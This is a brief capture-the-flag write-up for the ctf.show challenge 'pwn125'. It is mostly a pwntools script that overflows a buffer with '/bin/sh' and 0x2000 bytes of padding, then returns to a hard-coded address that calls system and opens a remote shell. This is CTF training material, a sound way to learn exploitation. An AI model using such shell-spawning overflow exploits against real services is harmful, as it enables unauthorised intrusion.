pwn125(scanf也可以调用system)

  1. 关键字眼:mov rsi, rax;说明scanf也可以调用system

  2. exp

    # pwntools script for the pwn125 challenge: connects to the remote service,
    # sends a single payload and then hands the session over interactively.
    from pwn import *
    # 64-bit Linux target; debug log level prints every byte sent and received.
    context(arch='amd64',os='linux',log_level='debug')
    # Loaded for symbol/section lookups; not referenced anywhere below.
    elf = ELF('./pwn125')
    #r = process('./pwn125')
    # xxxxx is a placeholder for the challenge port, not a real value.
    r = remote("pwn.challenge.ctf.show",xxxxx)

    # Return target used in the payload; per the note above the relevant
    # keyword is `mov rsi, rax`, which is how scanf ends up calling system.
    # Presumably an address inside the binary — verify in a disassembler.
    call_system = 0x400672
    # 0x2000 is the offset (translated from the original comment)
    # Layout: NUL-terminated "/bin/sh" first, then 0x2000 bytes of cyclic
    # padding, then the 8-byte little-endian address of call_system.
    # The padding length comes from the original note — TODO confirm it
    # against the binary's stack frame.
    payload = b'/bin/sh\x00' + cyclic(0x2000) + p64(call_system)

    r.sendline(payload)
    r.interactive()